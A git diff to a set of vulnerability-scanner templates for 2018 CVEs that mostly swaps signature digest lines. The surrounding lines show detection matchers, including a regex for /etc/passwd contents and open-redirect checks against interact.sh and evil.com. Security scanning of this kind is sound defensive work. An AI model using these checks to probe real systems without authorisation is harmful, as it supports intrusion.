b/http/cves/2018/CVE-2018-12634.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070d438b8deca8262b388a1ac84d7a28612a28f7eb0ec72da39762e02a9ab2c6e02205bdbf452ac32f90703c55fbb539c9a91679e39359fcbaf302d82948f56a6b57b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 307b4d29ec..7c9a0a106d 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -41,4 +41,4 @@ http: part: body words: - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">' -# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f687e998ebd40e7f6e0cd7750ccdc2f8cd832181f93aa0404dd46ea313b3754502200c2cbb0e94b7ac91d20cd6904518d07f26788a7f5ba5f1318552e687577c3e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index c1035c0910..82fa5984d6 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 8921fad110..7ccfefb35a 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e147e540018e89eb8892a229a98bbab99feca5c6f1416e246e0264aa28dd539022100c3f35f328d7fc8c2c5141f428a2585389f9262293b5bccb23bd929c7798c2374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 1cae4d01e3..cf3a399d3d 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -40,4 +40,4 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220259917bb43137924f23094b16480365fa1e3839c5fca4713af8f2f63008f58d202210082449a7709741b6ff30609ecff6d86e847e2517c01cba5c4694973ee94fa9ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index da29fe40f3..1f6241640e 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082af42871fa237fbd8e44fca7400eefd815f0228679b14a47eef8e58bf9bd2c30220677acd9c0f102308eef360373ba7b6611d2e1c1a2d5a909ed06667e3a9812e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index df6be56a15..413e751f73 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203224fda196eb1cbc81b68a79d58afaed6d9d7d9c8821fbcc463a6bc0e7295ad4022059cbe8295c4346847a37bf4a6db45ed614ead696931c35f803ddd046ee3c3c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 10802111ee..d80782ef1c 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090246985aa33f0e41c9ed59146b95be1f9cdf7ab26257777ce98c063ed12309c02202b81c53a22187906b5e2321ac991e64fe0ee52372aee7f041ea1d9de847edb66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index c4498e6831..6f1620e74e 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203794f97eb985e7b51a642cd485979e762edf2fa8b530829012c75ba4e3091830022100a2ffa6b6686a57dc714d016096bfc2ae7990e9e9d11a3514fa51cd92a05fe911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 50c5926871..8bde4688f3 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 301 -# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bedaae748e6aaf48b9c690e95cc9f56486416f4d42f946b7db3201185738e9b8022100f1b531a7f5d0c01c6c14cb2238b20ca9ec8bb63947c1bef07d0adcd8f59cc6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index b6d5efdc15..cddf9426d8 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009214b35bc48d118e49903f07e951d276886bb2e963f35ada6608986e8379df6602202b9b26b182e0feccd8855c0eeeefbd4e71305d040621695262cf1b5336fe9b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index f5bf97e49f..30e32db710 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201431da7cb7d0c6f1cc9fe645c0cb50a7fd2bd61e9bf77564ef03316199d1e4f6022100f8c96bfcbbe4073e99071df37061329f4acf9403c04049f844f8d7c713c2ab0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index c2e66e6be1..02090d2feb 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac853014f271b944b9ee20135ae63f4f05560df732d9ffb2d4a315c1298854da02202669480469ad9fa8caf3ecac955cda21d510d1dabc69069dd5fbc3ff497533b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 7fb0af70ea..ebb1b7959d 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f0f25f2551f0a387e62f98821d148b071d8feeb62c016ee0a73491fbef4b47c02210083dd29779ff7f5309807d128bb88de8a1a1aa9ca767c5b36f90a3313fc9bb651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 636a38d5fe..6e42b8366e 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e26f46ac8fa0fbf78f910c608f41335ab410d944ba39bd21b4a25bf3f366b2c70221008bcd07b274e596cc4f0004c5167e46e1e2955692de90e4d0356634f1390bb2b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 577811a98e..1d233eb624 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc45ca6bc462dfa12f3816a1d91516eb665c5c4890cbdc399651e65cb9d55488022100bc6fa04ba3a8224f267355833878b5b57b1da1a0cc82659bf3019b7aa6bd7c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 2a0195b5ec..f2a35a1f74 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ca9821ca84e3035987df97624dd5b8883b8c4849fc29b8142652e4e7d0080610220312c12edb16e29c072a827155cdebc39f586b5d5c69b398cb846e2c7d93792da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 068a749ecc..1db18b2221 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203412aba03e7df739713f759fcb37bef1eea1d3999931083f45827e66691d050f022100bfeb476846fd53627a129ee79b9bb245ee5f7a9c8fa80b019225676c03b850b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8051dbeca7..e9bddd04e4 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -78,4 +78,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c705261b07bb3b5134ebe70f694bcf5598515f94687a58001eccb1f58fb9e6002206cc7bf1c42677820f7b501bd2aeed96acae06ab3780e0481a51780a3a7e97c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 7fc5089482..b01dcb1143 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ed92c577723c47cb124f92446376127d6b6b6fcd2f6431bbbfe68e31a967e7b022017675d53de48db41cb32b1ba9e129efe88f22de8ef6b0bc3627c9470229ff9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index a7865f4a1b..417ee6ca3a 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204299459be2a55a288065e032b7726f84a36e94e06623cdc89bc6cbfe1f06f73402201a6086d0a7faeced068ec0dd8aa934238754b35510074d06c3671d2b5e93f945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 48403dbf14..72474e0253 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100952a1352dd220013331b92a16c56b5dbbf5c5b182026eed1fe8c66a80f18c3f20221008371d2a7719b97ddcef29d12f4bbb58467f8d043fa3f24801eada79ea643b899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index ef4e429b1a..24a5cdb12b 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f345418a161970b49efb6847c938b02cf85e55ab2728b7a999c99c1298947949022011733c212eabc394a4c104cef7a0ae31b2b2297505c4c2364ac73d2dad0c2411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 31b1b073df..7ed174c5b3 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25577d15cb32f1ccc5b8c48bd1cee8c81f2c55bf33b6c19e89312d5e7cedc150221008796a9740e57e6b50caf52841a8a4c9d52a17662d1d3ae7bea7549de24603e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 8fce44ae25..92f2cb104f 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b54f467183de3b3a31a23eff25fa6b7e31a40b596318042dd4a50afc2466987b02201e7898d41a785ccdb33f9ead77fbcab180c3bc0dca2a626981f431882fed4cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 093cbd5654..1e250bb291 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204562ef9fe20f212abf05ec4054f5fb31ac2f4a14939814e81691480bad569df00221008627875be3d1ece4db50fe44826d8bcb8aa0b34273478d04591d11762f1a31eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 543356e243..659b6f5ad7 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204094d65babc7f0b5c8c10d59b17d51f9ce5a347b0e0a86a8b1f4d4b26623b06202204860bf57ffcc49976f3017bfba65e702e9b416919b8f7e5bd18ad345625f0285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 38a7254a31..cccc297153 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c2df0229ff7748acdd22d008c7f88c515a2b5fe7b93f0be7ff4faeaa59e37ca02210082b5dd9724a4b7d1b568fb6c433bcebd074fd44c03fc25152b56981c927cf3a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index df5c6fa029..2df7730492 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f0f643f0280b3aefe1f1955b44b15712d5ccbcbdf55470bf60ae139ad08b3870221008a61c94baf588d5590ba60988681f69ac91aa02ad71a098ac1c191a627a45c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 5a40cf4a8c..e0dccd1114 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -50,4 +50,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058db5a0e66e0185894958f6d96aecf72c3bcfed2c0a1d26f6add29d09ce286c802200fc8d42f35b7c7769ee299622a43e1f8505ee63afe91b259c4ea10fdaaaff74a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 7beff17567..0247e45dfa 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -56,4 +56,4 @@ http: part: header words: - "application/json" -# digest: 4b0a0048304602210082c27b58a7f2461aff554dd5d689c6b64d365eb7a4307bb262df7556c0cfa5bd022100ccdcc3e07ad2d7fbb7a24bf16ad8d46efb371342f7048f1d74eba4b0db5eb126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220617b736bbf999b2273a36778922c989410f903fe4ffae35247d32cf4ee34ebb3022100c153e7a8dc7347707d23c5b67d8a30b1b569d1043c8aa5b1c7a09f288bd0ce50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 63ae0948f8..93ef2179f2 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -43,4 +43,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc614c7ce6111ad91c84bd0aa0ea41a890f1011589191cb9bf421297dcb368c0022014a093e4b3f0c08bb8ae522059822568b1460a62461658ab6f3f0239ec6a8e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 18a7b2afcb..82a7c3ab6a 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -45,4 +45,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203711794115d3d48fe1e54bde3f66294c6322bb5832ec13b693571002187aef62022005459fec38936e0160b953d01498c72eb1547cb6cb2acc349339e9198d2af996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 805cbeff17..fe101065ea 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff8e2819554ce13b65be92c0e0817693ae784d7a5bda9516043c29baf3aa80d3022100e51109d7d609a86eae88cc6ca27706ca658e1257ee76890516cbb810a1b12acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index d4f8177ae5..8210788332 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220573467f2d253679a8ca0abe62ede74d07eb4b89953992c906843c11cad9a695e02201a0f31679a22b7dbe2e68ad75b65e94e48e09602d688d256fa627afd2f05dc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index ecb172f620..628e40044e 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072a99586909e4df9893ddbe97f55ceea487163c8a6d2fa7bb1fd3f426fff0a31022100b894b36b035f3eb1fca2f1ff1dd4c79b5e5e1140d19e9ee8f1e90b9b36ac21e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 